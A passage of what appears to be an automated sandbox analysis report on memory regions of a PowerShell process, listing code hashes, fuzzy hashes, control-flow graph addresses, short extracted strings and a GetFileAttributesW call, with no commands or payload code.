                                    • Opcode ID: 30191a0d9463b30f0556963e4dbe51cc637483bfa10c3bd1481e0a1e212b41ac
                                    • Instruction ID: 5e5987a7ed35989cc70af2ed91d79a30abbb7e47fd6bdac04b5b6ff3641aec2f
                                    • Opcode Fuzzy Hash: 30191a0d9463b30f0556963e4dbe51cc637483bfa10c3bd1481e0a1e212b41ac
                                    • Instruction Fuzzy Hash: E72290B0A012199FCB14DF65C880A9EB7F2FF89308F158969E505EB764DB70AD85CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0845c270f74b891255fcff9a5ca8059de1ba0fbc33a2d5f9539a89f578a0cafa
                                    • Instruction ID: 73e746f53548559b7b52e2e1ab29f9eb802b3a9833824af4dfe6d6982ec051f2
                                    • Opcode Fuzzy Hash: 0845c270f74b891255fcff9a5ca8059de1ba0fbc33a2d5f9539a89f578a0cafa
                                    • Instruction Fuzzy Hash: 18026BB5A01306DBDB14DF65C840AAEB7B2EF85308F10D579E9019F395EB35E886CB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1458 7ec4f88-7ec4fb2 1459 7ec524c-7ec5255 1458->1459 1460 7ec4fb8-7ec4fc4 1458->1460 1461 7ec52a6-7ec52b0 1459->1461 1462 7ec5257-7ec525d 1459->1462 1460->1459 1464 7ec4fca-7ec4fd2 1460->1464 1592 7ec5260 call 7ec4c00 1462->1592 1593 7ec5260 call 7ec4c10 1462->1593 1464->1459 1466 7ec4fd8-7ec4fda 1464->1466 1465 7ec5266-7ec5269 1465->1461 1467 7ec4fdc-7ec4ff1 1466->1467 1468 7ec4ff3 1466->1468 1469 7ec4ff6-7ec5004 1467->1469 1468->1469 1472 7ec501a-7ec5024 1469->1472 1473 7ec5006-7ec5014 1469->1473 1472->1459 1476 7ec502a-7ec5034 1472->1476 1473->1459 1473->1472 1477 7ec50aa-7ec50e2 1476->1477 1478 7ec5036-7ec5043 1476->1478 1489 7ec50e4-7ec5103 1477->1489 1490 7ec5105-7ec5113 1477->1490 1479 7ec5095-7ec50a4 1478->1479 1480 7ec5045-7ec508d 1478->1480 1479->1477 1484 7ec52b3-7ec5316 1479->1484 1480->1479 1512 7ec531c-7ec533c 1484->1512 1489->1490 1496 7ec5124-7ec512b 1490->1496 1497 7ec5115-7ec511d 1490->1497 1499 7ec512d-7ec5136 1496->1499 1500 7ec5139-7ec5174 1496->1500 1497->1496 1499->1500 1510 7ec517a-7ec5187 1500->1510 1511 7ec5247-7ec5249 1500->1511 1513 7ec5189-7ec51bf 1510->1513 1514 7ec51c7-7ec51df 1510->1514 1511->1459 1516 7ec533e-7ec534f 1512->1516 1513->1514 1514->1511 1521 7ec51e1-7ec51ee 1514->1521 1519 7ec535d 1516->1519 1520 7ec5351-7ec535b 1516->1520 1522 7ec5362-7ec5364 1519->1522 1520->1522 1524 7ec522e-7ec5240 1521->1524 1525 7ec51f0-7ec5226 1521->1525 1526 7ec5399-7ec539f 1522->1526 1527 7ec5366-7ec5376 1522->1527 1524->1511 1525->1524 1527->1526 1532 7ec5378-7ec537c 1527->1532 1534 7ec537e-7ec5396 1532->1534 1535 7ec53a0-7ec540d 1532->1535 1534->1526 1547 7ec5594-7ec55ab 1535->1547 1548 7ec5413-7ec541e 1535->1548 1553 7ec55b2-7ec55d3 1547->1553 1549 7ec5449-7ec544f 1548->1549 1550 7ec5420-7ec5448 1548->1550 1552 7ec5455-7ec5461 1549->1552 1549->1553 1559 7ec54ac-7ec54b4 1552->1559 1560 7ec5463-7ec5469 1552->1560 1561 7ec55ee-7ec55f4 1553->1561 1562 7ec55d5-7ec55da 1553->1562 1563 7ec54be-7ec54c0 1559->1563 1564 7ec547c 1560->1564 1565 7ec546b-7ec547a 1560->1565 1562->1561 1566 7ec55dc-7ec55e1 1562->1566 1567 7ec54ea-7ec54fa 1563->1567 1568 7ec54c2-7ec54c7 1563->1568 1570 7ec547e-7ec54ab 1564->1570 1565->1570 1566->1561 1569 7ec55e3-7ec55ed 1566->1569 1567->1553 1577 7ec5500-7ec5516 1567->1577 1568->1553 1571 7ec54cd-7ec54d8 1568->1571 1575 7ec54da-7ec54df 1571->1575 1576 7ec54e1 1571->1576 1582 7ec54e6-7ec54e8 1575->1582 1576->1582 1578 7ec551f 1577->1578 1579 7ec5518-7ec551d 1577->1579 1583 7ec5524-7ec5539 1578->1583 1579->1583 1582->1567 1584 7ec54b6-7ec54bd 1582->1584 1586 7ec553b-7ec5562 1583->1586 1587 7ec5563-7ec5593 1583->1587 1584->1563 1592->1465 1593->1465
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `oXk
                                    • API String ID: 0-4058762126
                                    • Opcode ID: 82fa7a6e6e2459f96002b665f1ee4e6d920b9445b3d16704362f27b4c80b98c7
                                    • Instruction ID: 95909a1aa299dd2e7cf59b0a994b2d4677087b59307ca9a54d873ec028081c35
                                    • Opcode Fuzzy Hash: 82fa7a6e6e2459f96002b665f1ee4e6d920b9445b3d16704362f27b4c80b98c7
                                    • Instruction Fuzzy Hash: 5212F4B4B012059FDB14DFA4C994AAEBBB2EF84308F24816DD9059B791DB34EC52CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1594 7ecc6f0-7ecc702 1595 7ecc704-7ecc71b 1594->1595 1596 7ecc720-7ecc73a 1594->1596 1602 7eccc37-7eccc3e 1595->1602 1599 7ecc73c-7ecc7b1 1596->1599 1600 7ecc7b6-7ecc7c2 1596->1600 1599->1602 1605 7ecc7c4-7ecc7d4 1600->1605 1606 7ecc7e6-7ecc7eb 1600->1606 1605->1606 1608 7ecc7d6-7ecc7e4 1605->1608 1609 7ecc7ed-7ecc7f0 1606->1609 1610 7ecc7f8 1606->1610 1608->1606 1613 7ecc7fd-7ecc810 1608->1613 1609->1610 1610->1602 1619 7ecc816-7ecc834 1613->1619 1620 7ecc8a7-7ecc8b5 1613->1620 1626 7ecc879-7ecc8a2 1619->1626 1627 7ecc836-7ecc84d 1619->1627 1624 7ecc8c7-7ecc8cc 1620->1624 1625 7ecc8b7-7ecc8c5 1620->1625 1628 7ecc8ce-7ecc8d1 1624->1628 1629 7ecc8d9 1624->1629 1625->1624 1634 7ecc8de-7ecc8ec 1625->1634 1626->1602 1636 7ecc84f 1627->1636 1637 7ecc856-7ecc877 1627->1637 1628->1629 1629->1602 1641 7ecc8f2-7ecc910 1634->1641 1642 7ecc983-7ecc98c 1634->1642 1636->1637 1637->1626 1650 7ecc955-7ecc97e 1641->1650 1651 7ecc912-7ecc929 1641->1651 1648 7ecc98e-7ecc9f4 1642->1648 1649 7ecc9f9-7ecca07 1642->1649 1648->1602 1658 7ecca0d-7ecca2a 1649->1658 1659 7eccb7a-7eccb88 1649->1659 1650->1602 1656 7ecc92b 1651->1656 1657 7ecc932-7ecc953 1651->1657 1656->1657 1657->1650 1674 7eccae9-7eccb07 1658->1674 1675 7ecca30-7ecca45 1658->1675 1665 7eccb8e-7eccbaf 1659->1665 1666 7eccc25-7eccc2a 1659->1666 1677 7eccbf7-7eccc23 1665->1677 1678 7eccbb1-7eccbc8 1665->1678 1666->1602 1670 7eccc2c-7eccc2f 1666->1670 1670->1602 1684 7eccb4c-7eccb75 1674->1684 1685 7eccb09-7eccb20 1674->1685 1686 7ecca4b-7ecca6b 1675->1686 1687 7eccc41-7ecccac 1675->1687 1677->1602 1688 7eccbca 1678->1688 1689 7eccbd1-7eccbf5 1678->1689 1684->1602 1698 7eccb29-7eccb4a 1685->1698 1699 7eccb22 1685->1699 1712 7ecca6d-7ecca86 1686->1712 1713 7eccad7-7eccae3 1686->1713 1723 7ecccae-7ecccc1 1687->1723 1724 7eccce1-7eccce8 1687->1724 1688->1689 1689->1677 1698->1684 1699->1698 1712->1713 1720 7ecca88-7eccad2 1712->1720 1713->1674 1713->1675 1720->1602 1728 7ecccc9-7ecccdf 1723->1728 1728->1723 1728->1724
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: x^e^
                                    • API String ID: 0-1436426643
                                    • Opcode ID: c15a629205766fa8461a0da8fb9714bf73ec3bcadcb1358c9c66b0282e25a164
                                    • Instruction ID: e9527801f8998ea28420663361d9cb1e2979aceb090dec7b5dc6f60da679fe93
                                    • Opcode Fuzzy Hash: c15a629205766fa8461a0da8fb9714bf73ec3bcadcb1358c9c66b0282e25a164
                                    • Instruction Fuzzy Hash: 6CF17375B002159FDB14DB78C590AAE77E2AFC8248B55943CD90ADF364EF34EC028BA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1836 4d45668-4d4566c 1837 4d45666 1836->1837 1838 4d4566e-4d456ba 1836->1838 1837->1836 1841 4d456c2-4d456ed GetFileAttributesW 1838->1841 1842 4d456bc-4d456bf 1838->1842 1843 4d456f6-4d45713 1841->1843 1844 4d456ef-4d456f5 1841->1844 1842->1841 1844->1843
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(00000000), ref: 04D456E0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.426424982.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_4d40000_powershell.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 89478dd56eeb532cca724bf65b2956af1d642a6d3f2fb10d4ee52d1e1311b07f
                                    • Instruction ID: 26ece27f5f618d8b8db25554b081b1bf85ab22495ae814c98e7bcd5376c3efba
                                    • Opcode Fuzzy Hash: 89478dd56eeb532cca724bf65b2956af1d642a6d3f2fb10d4ee52d1e1311b07f
                                    • Instruction Fuzzy Hash: 2D2124B6D002199BCB14CF9AE854BDEFBB4FB88320F15851AD919B7640C774AA44CFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1847 4d43d1c-4d456ba 1850 4d456c2-4d456ed GetFileAttributesW 1847->1850 1851 4d456bc-4d456bf 1847->1851 1852 4d456f6-4d45713 1850->1852 1853 4d456ef-4d456f5 1850->1853 1851->1850 1853->1852
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(00000000), ref: 04D456E0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.426424982.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_4d40000_powershell.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 8acd4b317de132cb84b029ac9f5d56fdaf2178457c9490d3f2316ef5e270e9dd
                                    • Instruction ID: 0a547955e20943f9d79520fd03ad4d71f2155f0012c37f6195bfe97c69c506ec
                                    • Opcode Fuzzy Hash: 8acd4b317de132cb84b029ac9f5d56fdaf2178457c9490d3f2316ef5e270e9dd
                                    • Instruction Fuzzy Hash: A82133B1D00619ABCB14CF9AD454B9EFBB4FB88360F14812AE919B7700D774A900CFE5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1856 7ec4f79-7ec4fb2 1857 7ec524c-7ec5255 1856->1857 1858 7ec4fb8-7ec4fc4 1856->1858 1859 7ec52a6-7ec52b0 1857->1859 1860 7ec5257-7ec525d 1857->1860 1858->1857 1862 7ec4fca-7ec4fd2 1858->1862 1990 7ec5260 call 7ec4c00 1860->1990 1991 7ec5260 call 7ec4c10 1860->1991 1862->1857 1864 7ec4fd8-7ec4fda 1862->1864 1863 7ec5266-7ec5269 1863->1859 1865 7ec4fdc-7ec4ff1 1864->1865 1866 7ec4ff3 1864->1866 1867 7ec4ff6-7ec5004 1865->1867 1866->1867 1870 7ec501a-7ec5024 1867->1870 1871 7ec5006-7ec5014 1867->1871 1870->1857 1874 7ec502a-7ec5034 1870->1874 1871->1857 1871->1870 1875 7ec50aa-7ec50e2 1874->1875 1876 7ec5036-7ec5043 1874->1876 1887 7ec50e4-7ec5103 1875->1887 1888 7ec5105-7ec5113 1875->1888 1877 7ec5095-7ec50a4 1876->1877 1878 7ec5045-7ec508d 1876->1878 1877->1875 1882 7ec52b3-7ec5316 1877->1882 1878->1877 1910 7ec531c-7ec533c 1882->1910 1887->1888 1894 7ec5124-7ec512b 1888->1894 1895 7ec5115-7ec511d 1888->1895 1897 7ec512d-7ec5136 1894->1897 1898 7ec5139-7ec5174 1894->1898 1895->1894 1897->1898 1908 7ec517a-7ec5187 1898->1908 1909 7ec5247-7ec5249 1898->1909 1911 7ec5189-7ec51bf 1908->1911 1912 7ec51c7-7ec51df 1908->1912 1909->1857 1914 7ec533e-7ec534f 1910->1914 1911->1912 1912->1909 1919 7ec51e1-7ec51ee 1912->1919 1917 7ec535d 1914->1917 1918 7ec5351-7ec535b 1914->1918 1920 7ec5362-7ec5364 1917->1920 1918->1920 1922 7ec522e-7ec5240 1919->1922 1923 7ec51f0-7ec5226 1919->1923 1924 7ec5399-7ec539f 1920->1924 1925 7ec5366-7ec5376 1920->1925 1922->1909 1923->1922 1925->1924 1930 7ec5378-7ec537c 1925->1930 1932 7ec537e-7ec5396 1930->1932 1933 7ec53a0-7ec540d 1930->1933 1932->1924 1945 7ec5594-7ec55ab 1933->1945 1946 7ec5413-7ec541e 1933->1946 1951 7ec55b2-7ec55d3 1945->1951 1947 7ec5449-7ec544f 1946->1947 1948 7ec5420-7ec5448 1946->1948 1950 7ec5455-7ec5461 1947->1950 1947->1951 1957 7ec54ac-7ec54b4 1950->1957 1958 7ec5463-7ec5469 1950->1958 1959 7ec55ee-7ec55f4 1951->1959 1960 7ec55d5-7ec55da 1951->1960 1961 7ec54be-7ec54c0 1957->1961 1962 7ec547c 1958->1962 1963 7ec546b-7ec547a 1958->1963 1960->1959 1964 7ec55dc-7ec55e1 1960->1964 1965 7ec54ea-7ec54fa 1961->1965 1966 7ec54c2-7ec54c7 1961->1966 1968 7ec547e-7ec54ab 1962->1968 1963->1968 1964->1959 1967 7ec55e3-7ec55ed 1964->1967 1965->1951 1975 7ec5500-7ec5516 1965->1975 1966->1951 1969 7ec54cd-7ec54d8 1966->1969 1973 7ec54da-7ec54df 1969->1973 1974 7ec54e1 1969->1974 1980 7ec54e6-7ec54e8 1973->1980 1974->1980 1976 7ec551f 1975->1976 1977 7ec5518-7ec551d 1975->1977 1981 7ec5524-7ec5539 1976->1981 1977->1981 1980->1965 1982 7ec54b6-7ec54bd 1980->1982 1984 7ec553b-7ec5562 1981->1984 1985 7ec5563-7ec5593 1981->1985 1982->1961 1990->1863 1991->1863
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `oXk
                                    • API String ID: 0-4058762126
                                    • Opcode ID: bb6c761096a5ea013fcdc7e7f5d7221e787b27e932a4a55269188577fd6e5da6
                                    • Instruction ID: d8bbb54558f51419c90d712c5a0508b167e46c1dafae2351b9c9d1bcde8da56b
                                    • Opcode Fuzzy Hash: bb6c761096a5ea013fcdc7e7f5d7221e787b27e932a4a55269188577fd6e5da6
                                    • Instruction Fuzzy Hash: 9AA15AB4A012459FDB04DFA5C580AAEBBF2FF84308F64856CD9059B7A5DB30EC56CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2057 7ea8248-7ea8263 2058 7ea82c1-7ea82e0 2057->2058 2059 7ea8265-7ea826d 2057->2059 2069 7ea82e2-7ea8308 2058->2069 2070 7ea8361-7ea83b7 2058->2070 2060 7ea827b-7ea829a 2059->2060 2061 7ea826f-7ea8271 2059->2061 2067 7ea82aa 2060->2067 2068 7ea829c-7ea82a8 2060->2068 2061->2060 2071 7ea82ac-7ea82af 2067->2071 2068->2071 2075 7ea82b7-7ea82be 2071->2075
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: |4Pl
                                    • API String ID: 0-3715169619
                                    • Opcode ID: 4d1007ed822d6487862c9d2e8c011843780806121813102644703ade426deccf
                                    • Instruction ID: 1ace66a2c76cc13037a79093867a28f7ad6664778583926ed347afe02993b7ca
                                    • Opcode Fuzzy Hash: 4d1007ed822d6487862c9d2e8c011843780806121813102644703ade426deccf
                                    • Instruction Fuzzy Hash: DF312574705215AFCB08EF69D444AAEBBA2EFC1218F05892DE515CF3A4CB30EC058BD1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2105 7ecf1c0-7ecf1d5 2107 7ecf27f-7ecf2b8 2105->2107 2108 7ecf1db-7ecf1f0 2105->2108 2132 7ecf2bb call 7ecf2cf 2107->2132 2133 7ecf2bb call 7ecf2d0 2107->2133 2111 7ecf1f9-7ecf20a 2108->2111 2112 7ecf1f2-7ecf1f8 2108->2112 2116 7ecf20c-7ecf211 2111->2116 2117 7ecf213-7ecf21c call 7ece270 2111->2117 2119 7ecf21f-7ecf223 2116->2119 2117->2119 2122 7ecf26b-7ecf273 call 7ecd678 2119->2122 2123 7ecf225-7ecf263 2119->2123 2126 7ecf278-7ecf27e 2122->2126 2123->2122 2124 7ecf2be-7ecf2bf 2132->2124 2133->2124
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: `oXk
                                    • API String ID: 0-4058762126
                                    • Opcode ID: 24b44f63fce22d702bb5a395adaa4a7886410f2f259c104f2a2306a19592f2be
                                    • Instruction ID: 98463fb072327cc053e804bbd7f0e01fe94e32b68bccdeee88cfd65513be6190
                                    • Opcode Fuzzy Hash: 24b44f63fce22d702bb5a395adaa4a7886410f2f259c104f2a2306a19592f2be
                                    • Instruction Fuzzy Hash: A421F339A056048FCB18EBB4C4005AE77B3EFC5218F0589BDC5098B7A0EB30AC06CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2084 7ecf060-7ecf08c 2087 7ecf08e-7ecf098 2084->2087 2088 7ecf0e5-7ecf0f4 2084->2088 2091 7ecf09a-7ecf0a6 2087->2091 2092 7ecf0f5-7ecf140 2087->2092 2091->2092 2095 7ecf0a8-7ecf0d8 2091->2095 2104 7ecf0df-7ecf0e4 2095->2104
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: H/Pl
                                    • API String ID: 0-2991250996
                                    • Opcode ID: afe53f011ad44c03993d68e4e8f9db0a5db885091812565a73e9b863d9304081
                                    • Instruction ID: d1417d2c832df2eaee180dfbc0317652240bf1286ef8e83462b508ca3fb75c99
                                    • Opcode Fuzzy Hash: afe53f011ad44c03993d68e4e8f9db0a5db885091812565a73e9b863d9304081
                                    • Instruction Fuzzy Hash: 6521033530C2504FC709A778692967E7BA7EFC6519B14006ED006C7782CF388C068BD1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 10daf7c00c06ed68e4745c4be13bfcfb637328b0fa1a86efceac4d766293b086
                                    • Instruction ID: 7fe5086f06f6041a6f32522c7be9cfd79e57dd4755a18fec50c6f8a21f2e7261
                                    • Opcode Fuzzy Hash: 10daf7c00c06ed68e4745c4be13bfcfb637328b0fa1a86efceac4d766293b086
                                    • Instruction Fuzzy Hash: 5F120CB4A01219DFDB64DF64C894FADBBB1BF48305F0095A9E809AB390DB34AD85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f808b1e1917b8fe2ac16b66e1301fc556d292cab0529e34aedaecd009e4d5f01
                                    • Instruction ID: bbd28b18844beeb5a9afe879b3666b47a75cf224ae711c2d092639f4c95bced2
                                    • Opcode Fuzzy Hash: f808b1e1917b8fe2ac16b66e1301fc556d292cab0529e34aedaecd009e4d5f01
                                    • Instruction Fuzzy Hash: F7D1B374B00205AFDF24DFA4C880BAEB7F2AF89304F15D529E505DB790DB74AC418B91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2b0f463b39308f0b5def6cb2e4add93eee0895ad806bdddec4d919eff381a4ea
                                    • Instruction ID: 42634983252df5edec729c258d002cbabda04ace30194aa4487f0d0751a7022b
                                    • Opcode Fuzzy Hash: 2b0f463b39308f0b5def6cb2e4add93eee0895ad806bdddec4d919eff381a4ea
                                    • Instruction Fuzzy Hash: 4771DEB97013109FDB18EB75D950BAEB7A6AB88708F14847DDA06DB380EF74DC428794
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 064fa9ccdba77718cbd3fb4b72d55c97e42c54651dc8d6b4685011c2a566bb8b
                                    • Instruction ID: 1242e5f091b7b8362866a694294dc196c4feb89d43581b0faefc626d03d9a9d7
                                    • Opcode Fuzzy Hash: 064fa9ccdba77718cbd3fb4b72d55c97e42c54651dc8d6b4685011c2a566bb8b
                                    • Instruction Fuzzy Hash: D3B12AB4A01258DFDB64DF29C898BAD77B5AF48305F1485D9E40AAB3A1DB34ED81CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 425d180a0544594242cd892d5ca1d59841d74814ddd6803b7e3138ae7427b379
                                    • Instruction ID: cd0d227576aa15aa510d57cf5cf031edf22ea6b770f67851b85ac055f9215534
                                    • Opcode Fuzzy Hash: 425d180a0544594242cd892d5ca1d59841d74814ddd6803b7e3138ae7427b379
                                    • Instruction Fuzzy Hash: 69915CB8701641DFCB05DF64C6949AABBF2FF89304B118558E90A8B762DB31EC52CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5aab19f87369264e42b09113bc055ce5e20787bd1835615dda355139b1c897f0
                                    • Instruction ID: 02607b7ef400d1c4631f23862efa62dbb6b0a64fb983c00685913be4a949c572
                                    • Opcode Fuzzy Hash: 5aab19f87369264e42b09113bc055ce5e20787bd1835615dda355139b1c897f0
                                    • Instruction Fuzzy Hash: 44819E74B002059FDB14DFA5C854A9EB7F2EFC8308F14896DD50AAB7A5DF31AC468B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c7b945301937778d740e9ac4378aefcd961617bd55a69bcd57b0859acbe462a5
                                    • Instruction ID: 3e4114befbc003f6a1360217ae0f9b3d29b1d61b745a13990e635e5ea27a6343
                                    • Opcode Fuzzy Hash: c7b945301937778d740e9ac4378aefcd961617bd55a69bcd57b0859acbe462a5
                                    • Instruction Fuzzy Hash: 1C817FB4B002099FDB04DFA5D954AEE7BB2EF88304F10852DE805AB394DB75ED46CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4e6715a3ddab5f9c2700864772b1be13d91a49ef58ab7fe593288930e435735d
                                    • Instruction ID: 96f4b82d6f4270a1686ad886a857b9c1bdf40595ebe36dfac6b53da62df7c524
                                    • Opcode Fuzzy Hash: 4e6715a3ddab5f9c2700864772b1be13d91a49ef58ab7fe593288930e435735d
                                    • Instruction Fuzzy Hash: F5913AB8701605DFCB05DF65C6949AABBF2FF89304B118568E90A8B761DB31EC52CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 118493c74759b59705a68a7493575792cadde347e2d0d2b4f12812072b4354a0
                                    • Instruction ID: d25c63375e331157f0eb27a348fc747e9e97827d7230358cd41ff6cc7348face
                                    • Opcode Fuzzy Hash: 118493c74759b59705a68a7493575792cadde347e2d0d2b4f12812072b4354a0
                                    • Instruction Fuzzy Hash: AC714F78B012158FDB24DF60C950BAEB7B1EF88218F2484ADD945AB744DB35DD86CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ff59502be5dc95e7580713a711278f6f3e52ceae7354644ac10bb9ae25ab5e8c
                                    • Instruction ID: 9532a406c4711ccbe4a3c82a66d58f414e49187be6e9458bca1390fe5f24190e
                                    • Opcode Fuzzy Hash: ff59502be5dc95e7580713a711278f6f3e52ceae7354644ac10bb9ae25ab5e8c
                                    • Instruction Fuzzy Hash: E15180B0A05249AFDB15CFA5C854BEE7BF6AF89304F148039E841AB391DB34ED45CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
